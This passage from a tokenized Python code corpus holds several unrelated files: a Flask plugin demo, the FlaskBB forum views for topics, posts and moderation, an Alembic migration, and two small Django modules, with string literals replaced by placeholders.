sentPhrasesDoD [ sent_id ] . has_key ( ref_phr ) <EOL> @ classmethod <EOL> def printRefPhrases ( cls , sent_id ) : <EOL> '''<STR_LIT>''' <EOL> for ref_phr in cls . sentPhrasesDoD . keys ( sent_id ) : <EOL> sys . stderr . write ( "<STR_LIT>" % ( ref_phr ) ) <EOL> return None </s>
<s> from flask import Flask , render_template , redirect , url_for , current_app <EOL> from flask_plugins import PluginManager , get_enabled_plugins , get_plugin , Plugin , emit_event <EOL> class AppPlugin ( Plugin ) : <EOL> def register_blueprint ( self , blueprint , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> current_app . register_blueprint ( blueprint , ** kwargs ) <EOL> SECRET_KEY = "<STR_LIT>" <EOL> app = Flask ( __name__ ) <EOL> app . config . from_object ( __name__ ) <EOL> plugin_manager = PluginManager ( app ) <EOL> @ app . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> emit_event ( "<STR_LIT>" ) <EOL> return render_template ( "<STR_LIT>" , plugins = get_enabled_plugins ( ) ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def disable ( plugin ) : <EOL> plugin = get_plugin ( plugin ) <EOL> plugin_manager . disable_plugins ( [ plugin ] ) <EOL> return redirect ( url_for ( "<STR_LIT:index>" ) ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def enable ( plugin ) : <EOL> plugin = get_plugin ( plugin ) <EOL> plugin_manager . enable_plugins ( [ plugin ] ) <EOL> return redirect ( url_for ( "<STR_LIT:index>" ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> app . run ( debug = True ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> from sqlalchemy import asc , desc <EOL> from flask import Blueprint , redirect , url_for , current_app , request , flash <EOL> from flask_login import login_required , current_user <EOL> from flask_babelplus import gettext as _ <EOL> from flask_allows import Permission , And <EOL> from flaskbb . extensions import db , allows <EOL> from flaskbb . utils . settings import flaskbb_config <EOL> from flaskbb . utils . helpers import ( <EOL> get_online_users , time_diff , format_quote , render_template , do_topic_action <EOL> ) <EOL> from flaskbb . utils . requirements import ( <EOL> CanAccessForum , <EOL> CanAccessTopic , <EOL> CanDeletePost , <EOL> CanDeleteTopic , <EOL> CanEditPost , <EOL> CanPostReply , <EOL> CanPostTopic , <EOL> IsAtleastModeratorInForum , <EOL> ) <EOL> from flaskbb . forum . models import ( <EOL> Category , Forum , Topic , Post , ForumsRead , TopicsRead <EOL> ) <EOL> from flaskbb . forum . forms import ( <EOL> NewTopicForm , <EOL> QuickreplyForm , <EOL> ReplyForm , <EOL> ReportForm , <EOL> SearchPageForm , <EOL> UserSearchForm , <EOL> ) <EOL> from flaskbb . user . models import User <EOL> forum = Blueprint ( "<STR_LIT>" , __name__ ) <EOL> @ forum . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> categories = Category . get_all ( user = current_user ) <EOL> user_count = User . query . count ( ) <EOL> topic_count = Topic . query . count ( ) <EOL> post_count = Post . query . count ( ) <EOL> newest_user = User . query . order_by ( User . id . desc ( ) ) . first ( ) <EOL> if not current_app . config [ "<STR_LIT>" ] : <EOL> online_users = User . query . filter ( User . lastseen >= time_diff ( ) ) . 
count ( ) <EOL> online_guests = None <EOL> else : <EOL> online_users = len ( get_online_users ( ) ) <EOL> online_guests = len ( get_online_users ( guest = True ) ) <EOL> return render_template ( "<STR_LIT>" , <EOL> categories = categories , <EOL> user_count = user_count , <EOL> topic_count = topic_count , <EOL> post_count = post_count , <EOL> newest_user = newest_user , <EOL> online_users = online_users , <EOL> online_guests = online_guests ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> def view_category ( category_id , slug = None ) : <EOL> category , forums = Category . get_forums ( category_id = category_id , user = current_user ) <EOL> return render_template ( "<STR_LIT>" , forums = forums , <EOL> category = category ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> @ allows . requires ( CanAccessForum ( ) ) <EOL> def view_forum ( forum_id , slug = None ) : <EOL> page = request . args . get ( '<STR_LIT>' , <NUM_LIT:1> , type = int ) <EOL> forum_instance , forumsread = Forum . get_forum ( <EOL> forum_id = forum_id , user = current_user <EOL> ) <EOL> if forum_instance . external : <EOL> return redirect ( forum_instance . external ) <EOL> topics = Forum . get_topics ( <EOL> forum_id = forum_instance . id , user = current_user , page = page , <EOL> per_page = flaskbb_config [ "<STR_LIT>" ] <EOL> ) <EOL> return render_template ( <EOL> "<STR_LIT>" , forum = forum_instance , <EOL> topics = topics , forumsread = forumsread , <EOL> ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ allows . requires ( CanAccessTopic ( ) ) <EOL> def view_topic ( topic_id , slug = None ) : <EOL> page = request . args . get ( '<STR_LIT>' , <NUM_LIT:1> , type = int ) <EOL> topic = Topic . get_topic ( topic_id = topic_id , user = current_user ) <EOL> topic . 
views += <NUM_LIT:1> <EOL> topic . save ( ) <EOL> posts = Post . query . join ( User , Post . user_id == User . id ) . filter ( Post . topic_id == topic . id ) . add_entity ( User ) . order_by ( Post . id . asc ( ) ) . paginate ( page , flaskbb_config [ '<STR_LIT>' ] , False ) <EOL> forumsread = None <EOL> if current_user . is_authenticated : <EOL> forumsread = ForumsRead . query . filter_by ( user_id = current_user . id , <EOL> forum_id = topic . forum . id ) . first ( ) <EOL> topic . update_read ( current_user , topic . forum , forumsread ) <EOL> form = None <EOL> if Permission ( CanPostReply ) : <EOL> form = QuickreplyForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> post = form . save ( current_user , topic ) <EOL> return view_post ( post . id ) <EOL> return render_template ( "<STR_LIT>" , topic = topic , posts = posts , <EOL> last_seen = time_diff ( ) , form = form ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> def view_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> count = post . topic . post_count <EOL> page = count / flaskbb_config [ "<STR_LIT>" ] <EOL> if count > flaskbb_config [ "<STR_LIT>" ] : <EOL> page += <NUM_LIT:1> <EOL> else : <EOL> page = <NUM_LIT:1> <EOL> return redirect ( post . topic . url + "<STR_LIT>" % ( page , post . id ) ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def new_topic ( forum_id , slug = None ) : <EOL> forum_instance = Forum . query . filter_by ( id = forum_id ) . first_or_404 ( ) <EOL> if not Permission ( CanPostTopic ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( forum_instance . url ) <EOL> form = NewTopicForm ( ) <EOL> if request . method == "<STR_LIT:POST>" : <EOL> if "<STR_LIT>" in request . form and form . 
validate ( ) : <EOL> return render_template ( <EOL> "<STR_LIT>" , forum = forum_instance , <EOL> form = form , preview = form . content . data <EOL> ) <EOL> if "<STR_LIT>" in request . form and form . validate ( ) : <EOL> topic = form . save ( current_user , forum_instance ) <EOL> return redirect ( url_for ( '<STR_LIT>' , topic_id = topic . id ) ) <EOL> return render_template ( <EOL> "<STR_LIT>" , forum = forum_instance , form = form <EOL> ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def delete_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( CanDeleteTopic ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . forum . url ) <EOL> involved_users = User . query . filter ( Post . topic_id == topic . id , <EOL> User . id == Post . user_id ) . all ( ) <EOL> topic . delete ( users = involved_users ) <EOL> return redirect ( url_for ( "<STR_LIT>" , forum_id = topic . forum_id ) ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def lock_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = topic . forum ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . url ) <EOL> topic . locked = True <EOL> topic . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def unlock_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . 
first_or_404 ( ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = topic . forum ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . url ) <EOL> topic . locked = False <EOL> topic . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def highlight_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = topic . forum ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . url ) <EOL> topic . important = True <EOL> topic . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def trivialize_topic ( topic_id = None , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = topic . forum ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . url ) <EOL> topic . important = False <EOL> topic . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def manage_forum ( forum_id , slug = None ) : <EOL> page = request . args . get ( '<STR_LIT>' , <NUM_LIT:1> , type = int ) <EOL> forum_instance , forumsread = Forum . get_forum ( forum_id = forum_id , <EOL> user = current_user ) <EOL> available_forums = Forum . query . order_by ( Forum . position ) . all ( ) <EOL> available_forums . 
remove ( forum_instance ) <EOL> if not Permission ( IsAtleastModeratorInForum ( forum = forum_instance ) ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( forum_instance . url ) <EOL> if forum_instance . external : <EOL> return redirect ( forum_instance . external ) <EOL> topics = Forum . get_topics ( <EOL> forum_id = forum_instance . id , user = current_user , page = page , <EOL> per_page = flaskbb_config [ "<STR_LIT>" ] <EOL> ) <EOL> mod_forum_url = url_for ( "<STR_LIT>" , forum_id = forum_instance . id , <EOL> slug = forum_instance . slug ) <EOL> if request . method == "<STR_LIT:POST>" : <EOL> ids = request . form . getlist ( "<STR_LIT>" ) <EOL> tmp_topics = Topic . query . filter ( Topic . id . in_ ( ids ) ) . all ( ) <EOL> if not len ( tmp_topics ) > <NUM_LIT:0> : <EOL> flash ( _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> return redirect ( mod_forum_url ) <EOL> if "<STR_LIT>" in request . form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = False ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = True ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = False ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . 
form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = True ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . form : <EOL> changed = do_topic_action ( topics = tmp_topics , user = current_user , <EOL> action = "<STR_LIT>" , reverse = False ) <EOL> flash ( _ ( "<STR_LIT>" , count = changed ) , "<STR_LIT:success>" ) <EOL> return redirect ( mod_forum_url ) <EOL> elif "<STR_LIT>" in request . form : <EOL> new_forum_id = request . form . get ( "<STR_LIT>" ) <EOL> if not new_forum_id : <EOL> flash ( _ ( "<STR_LIT>" ) , "<STR_LIT:info>" ) <EOL> return redirect ( mod_forum_url ) <EOL> new_forum = Forum . query . filter_by ( id = new_forum_id ) . first_or_404 ( ) <EOL> if not Permission ( <EOL> And ( <EOL> IsAtleastModeratorInForum ( forum_id = new_forum_id ) , <EOL> IsAtleastModeratorInForum ( forum = forum_instance ) <EOL> ) <EOL> ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( mod_forum_url ) <EOL> new_forum . move_topics_to ( tmp_topics ) <EOL> return redirect ( mod_forum_url ) <EOL> return render_template ( <EOL> "<STR_LIT>" , forum = forum_instance , topics = topics , <EOL> available_forums = available_forums , forumsread = forumsread , <EOL> ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def new_post ( topic_id , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> if not Permission ( CanPostReply ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . forum . url ) <EOL> form = ReplyForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> if "<STR_LIT>" in request . 
form : <EOL> return render_template ( <EOL> "<STR_LIT>" , topic = topic , <EOL> form = form , preview = form . content . data <EOL> ) <EOL> else : <EOL> post = form . save ( current_user , topic ) <EOL> return view_post ( post . id ) <EOL> return render_template ( "<STR_LIT>" , topic = topic , form = form ) <EOL> @ forum . route ( <EOL> "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] <EOL> ) <EOL> @ login_required <EOL> def reply_post ( topic_id , post_id ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> if not Permission ( CanPostReply ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( topic . forum . url ) <EOL> form = ReplyForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> if "<STR_LIT>" in request . form : <EOL> return render_template ( <EOL> "<STR_LIT>" , topic = topic , <EOL> form = form , preview = form . content . data <EOL> ) <EOL> else : <EOL> form . save ( current_user , topic ) <EOL> return redirect ( post . topic . url ) <EOL> else : <EOL> form . content . data = format_quote ( post . username , post . content ) <EOL> return render_template ( "<STR_LIT>" , topic = post . topic , form = form ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def edit_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> if not Permission ( CanEditPost ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( post . topic . url ) <EOL> form = ReplyForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> if "<STR_LIT>" in request . form : <EOL> return render_template ( <EOL> "<STR_LIT>" , topic = post . topic , <EOL> form = form , preview = form . content . data <EOL> ) <EOL> else : <EOL> form . populate_obj ( post ) <EOL> post . date_modified = datetime . datetime . 
utcnow ( ) <EOL> post . modified_by = current_user . username <EOL> post . save ( ) <EOL> return redirect ( post . topic . url ) <EOL> else : <EOL> form . content . data = post . content <EOL> return render_template ( "<STR_LIT>" , topic = post . topic , form = form ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def delete_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> if not Permission ( CanDeletePost ) : <EOL> flash ( _ ( "<STR_LIT>" ) , <EOL> "<STR_LIT>" ) <EOL> return redirect ( post . topic . url ) <EOL> first_post = post . first_post <EOL> topic_url = post . topic . url <EOL> forum_url = post . topic . forum . url <EOL> post . delete ( ) <EOL> if first_post : <EOL> return redirect ( forum_url ) <EOL> return redirect ( topic_url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:GET>" , "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def report_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> form = ReportForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> form . save ( current_user , post ) <EOL> flash ( _ ( "<STR_LIT>" ) , "<STR_LIT:success>" ) <EOL> return render_template ( "<STR_LIT>" , form = form ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" , "<STR_LIT:GET>" ] ) <EOL> @ login_required <EOL> def raw_post ( post_id ) : <EOL> post = Post . query . filter_by ( id = post_id ) . first_or_404 ( ) <EOL> return format_quote ( username = post . username , content = post . content ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def markread ( forum_id = None , slug = None ) : <EOL> if forum_id : <EOL> forum_instance = Forum . query . filter_by ( id = forum_id ) . first_or_404 ( ) <EOL> forumsread = ForumsRead . query . 
filter_by ( <EOL> user_id = current_user . id , forum_id = forum_instance . id <EOL> ) . first ( ) <EOL> TopicsRead . query . filter_by ( user_id = current_user . id , <EOL> forum_id = forum_instance . id ) . delete ( ) <EOL> if not forumsread : <EOL> forumsread = ForumsRead ( ) <EOL> forumsread . user_id = current_user . id <EOL> forumsread . forum_id = forum_instance . id <EOL> forumsread . last_read = datetime . datetime . utcnow ( ) <EOL> forumsread . cleared = datetime . datetime . utcnow ( ) <EOL> db . session . add ( forumsread ) <EOL> db . session . commit ( ) <EOL> flash ( _ ( "<STR_LIT>" , forum = forum_instance . title ) , <EOL> "<STR_LIT:success>" ) <EOL> return redirect ( forum_instance . url ) <EOL> ForumsRead . query . filter_by ( user_id = current_user . id ) . delete ( ) <EOL> TopicsRead . query . filter_by ( user_id = current_user . id ) . delete ( ) <EOL> forums = Forum . query . all ( ) <EOL> forumsread_list = [ ] <EOL> for forum_instance in forums : <EOL> forumsread = ForumsRead ( ) <EOL> forumsread . user_id = current_user . id <EOL> forumsread . forum_id = forum_instance . id <EOL> forumsread . last_read = datetime . datetime . utcnow ( ) <EOL> forumsread . cleared = datetime . datetime . utcnow ( ) <EOL> forumsread_list . append ( forumsread ) <EOL> db . session . add_all ( forumsread_list ) <EOL> db . session . commit ( ) <EOL> flash ( _ ( "<STR_LIT>" ) , "<STR_LIT:success>" ) <EOL> return redirect ( url_for ( "<STR_LIT>" ) ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> def who_is_online ( ) : <EOL> if current_app . config [ '<STR_LIT>' ] : <EOL> online_users = get_online_users ( ) <EOL> else : <EOL> online_users = User . query . filter ( User . lastseen >= time_diff ( ) ) . all ( ) <EOL> return render_template ( "<STR_LIT>" , <EOL> online_users = online_users ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def memberlist ( ) : <EOL> page = request . args . 
get ( '<STR_LIT>' , <NUM_LIT:1> , type = int ) <EOL> sort_by = request . args . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> order_by = request . args . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> sort_obj = None <EOL> order_func = None <EOL> if order_by == '<STR_LIT>' : <EOL> order_func = asc <EOL> else : <EOL> order_func = desc <EOL> if sort_by == '<STR_LIT>' : <EOL> sort_obj = User . id <EOL> elif sort_by == '<STR_LIT>' : <EOL> sort_obj = User . post_count <EOL> else : <EOL> sort_obj = User . username <EOL> search_form = UserSearchForm ( ) <EOL> if search_form . validate ( ) : <EOL> users = search_form . get_results ( ) . paginate ( page , flaskbb_config [ '<STR_LIT>' ] , False ) <EOL> return render_template ( "<STR_LIT>" , users = users , <EOL> search_form = search_form ) <EOL> else : <EOL> users = User . query . order_by ( order_func ( sort_obj ) ) . paginate ( page , flaskbb_config [ '<STR_LIT>' ] , False ) <EOL> return render_template ( "<STR_LIT>" , users = users , <EOL> search_form = search_form ) <EOL> @ forum . route ( "<STR_LIT>" ) <EOL> @ login_required <EOL> def topictracker ( ) : <EOL> page = request . args . get ( "<STR_LIT>" , <NUM_LIT:1> , type = int ) <EOL> topics = current_user . tracked_topics . outerjoin ( TopicsRead , <EOL> db . and_ ( TopicsRead . topic_id == Topic . id , <EOL> TopicsRead . user_id == current_user . id ) ) . add_entity ( TopicsRead ) . order_by ( Topic . last_updated . desc ( ) ) . paginate ( page , flaskbb_config [ '<STR_LIT>' ] , True ) <EOL> return render_template ( "<STR_LIT>" , topics = topics ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def track_topic ( topic_id , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> current_user . track_topic ( topic ) <EOL> current_user . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . 
route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ "<STR_LIT:POST>" ] ) <EOL> @ login_required <EOL> def untrack_topic ( topic_id , slug = None ) : <EOL> topic = Topic . query . filter_by ( id = topic_id ) . first_or_404 ( ) <EOL> current_user . untrack_topic ( topic ) <EOL> current_user . save ( ) <EOL> return redirect ( topic . url ) <EOL> @ forum . route ( "<STR_LIT>" , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def search ( ) : <EOL> form = SearchPageForm ( ) <EOL> if form . validate_on_submit ( ) : <EOL> result = form . get_results ( ) <EOL> return render_template ( '<STR_LIT>' , form = form , <EOL> result = result ) <EOL> return render_template ( '<STR_LIT>' , form = form ) </s>
<s> """<STR_LIT>""" <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> import sqlalchemy_utils <EOL> def upgrade ( ) : <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:id>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sqlalchemy_utils . types . uuid . UUIDType ( binary = <NUM_LIT:16> ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . String ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Boolean ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) <EOL> ) <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:id>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . Integer ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . Text ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DateTime ( ) , nullable = True ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ '<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) <EOL> ) <EOL> op . 
drop_table ( '<STR_LIT>' ) <EOL> def downgrade ( ) : <EOL> op . create_table ( '<STR_LIT>' , <EOL> sa . Column ( '<STR_LIT:id>' , sa . INTEGER ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . INTEGER ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . INTEGER ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . INTEGER ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . VARCHAR ( length = <NUM_LIT:255> ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT:message>' , sa . TEXT ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . DATETIME ( ) , nullable = True ) , <EOL> sa . Column ( '<STR_LIT>' , sa . BOOLEAN ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . BOOLEAN ( ) , nullable = False ) , <EOL> sa . Column ( '<STR_LIT>' , sa . BOOLEAN ( ) , nullable = False ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ u'<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ u'<STR_LIT>' ] , ) , <EOL> sa . ForeignKeyConstraint ( [ '<STR_LIT>' ] , [ u'<STR_LIT>' ] , ) , <EOL> sa . PrimaryKeyConstraint ( '<STR_LIT:id>' ) <EOL> ) <EOL> op . drop_table ( '<STR_LIT>' ) <EOL> op . drop_table ( '<STR_LIT>' ) </s>
<s> from django . conf import settings <EOL> STAFF_ONLY = getattr ( settings , '<STR_LIT>' , False ) <EOL> DEFAULT_LIST_ID = getattr ( settings , '<STR_LIT>' , <NUM_LIT:1> ) <EOL> DEFAULT_ASSIGNEE = getattr ( settings , '<STR_LIT>' , None ) <EOL> PUBLIC_SUBMIT_REDIRECT = getattr ( settings , '<STR_LIT>' , '<STR_LIT:/>' ) </s>
<s> import django <EOL> if django . get_version ( ) >= '<STR_LIT>' : <EOL> from django . template . loader import render_to_string <EOL> else : <EOL> from django . template import loader , RequestContext <EOL> def render_to_string ( template_name , context = None , request = None ) : <EOL> context_instance = RequestContext ( request ) if request else None <EOL> return loader . render_to_string ( <EOL> template_name , context , context_instance ) <EOL> from . import http <EOL> def temporary_unavailable ( request , template_name = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> context = { <EOL> '<STR_LIT>' : request . path , <EOL> } <EOL> return http . HttpResponseTemporaryUnavailable ( <EOL> render_to_string ( template_name , context ) ) </s>
